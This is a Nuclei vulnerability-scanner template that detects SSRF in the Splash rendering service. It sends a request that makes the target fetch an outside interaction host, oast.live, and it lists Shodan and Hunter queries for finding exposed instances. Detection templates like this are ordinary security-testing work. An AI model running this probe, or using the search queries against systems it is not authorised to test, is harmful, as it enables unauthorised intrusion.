nuclei-templates/vulnerabilities/splash/splash-render-ssrf.yaml

31 lines
652 B
YAML

id: splash-render-ssrf
info:
name: Splash Render - SSRF
author: pwnhxl
severity: high
reference:
- https://github.com/scrapinghub/splash
- https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
metadata:
verified: "true"
shodan-query: title:"Splash"
hunter-query: web.title="Splash" && header="TwistedWeb"
tags: splash,ssrf,oast,oss
requests:
- method: GET
path:
- "{{BaseURL}}/render.html?url=https://oast.live"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Interactsh Server'
- type: status
status:
- 200